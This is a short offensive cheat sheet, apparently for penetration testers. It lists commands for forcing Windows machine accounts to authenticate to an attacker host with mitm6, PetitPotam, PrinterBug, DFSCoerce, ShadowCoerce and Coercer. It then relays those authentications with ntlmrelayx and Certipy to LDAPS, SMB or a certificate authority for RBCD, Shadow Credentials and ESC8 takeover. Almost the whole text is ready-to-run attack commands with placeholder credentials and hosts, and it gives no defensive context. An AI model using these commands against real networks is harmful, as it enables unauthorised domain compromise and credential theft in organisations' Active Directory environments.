Force machine accounts to authenticate to you and relay it — PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, Coercer and mitm6, paired with ntlmrelayx / Certipy relay (RBCD, Shadow Credentials, ESC8).
mitm6 -d corp.local -i eth0
mitm6 -d corp.local --ignore-nofqdn
mitm6 -d corp.local -hw victim-host
impacket-ntlmrelayx -6 -t ldaps://dc01.corp.local -wh attacker-wpad --delegate-access
impacket-ntlmrelayx -6 -t ldaps://dc01.corp.local -wh attacker-wpad --add-computer
python3 PetitPotam.py 10.10.14.1 10.10.10.1
python3 PetitPotam.py -u user -p Password123 -d corp.local 10.10.14.1 10.10.10.1
python3 PetitPotam.py -pipe lsarpc 10.10.14.1 10.10.10.1
printerbug.py corp.local/user:[email protected] 10.10.14.1
dementor.py 10.10.14.1 10.10.10.1 -u user -p Password123 -d corp.local
rpcdump.py @10.10.10.1 | grep -i spool
dfscoerce.py -u user -p Password123 -d corp.local 10.10.14.1 10.10.10.1
shadowcoerce.py -u user -p Password123 -d corp.local 10.10.14.1 10.10.10.1
coercer scan -u user -p Password123 -d corp.local -t 10.10.10.1
coercer coerce -u user -p Password123 -d corp.local -l 10.10.14.1 -t 10.10.10.1
coercer coerce -u user -p Password123 -d corp.local -l 10.10.14.1 -t 10.10.10.1 --filter-method-name EfsRpcOpenFileRaw
impacket-ntlmrelayx -t ldaps://dc01.corp.local --delegate-access -smb2support
impacket-ntlmrelayx -t ldaps://dc01.corp.local --shadow-credentials --shadow-target "DC01$"
certipy relay -target http://ca.corp.local -template DomainController
impacket-ntlmrelayx -t smb://10.10.10.1 -smb2support -socks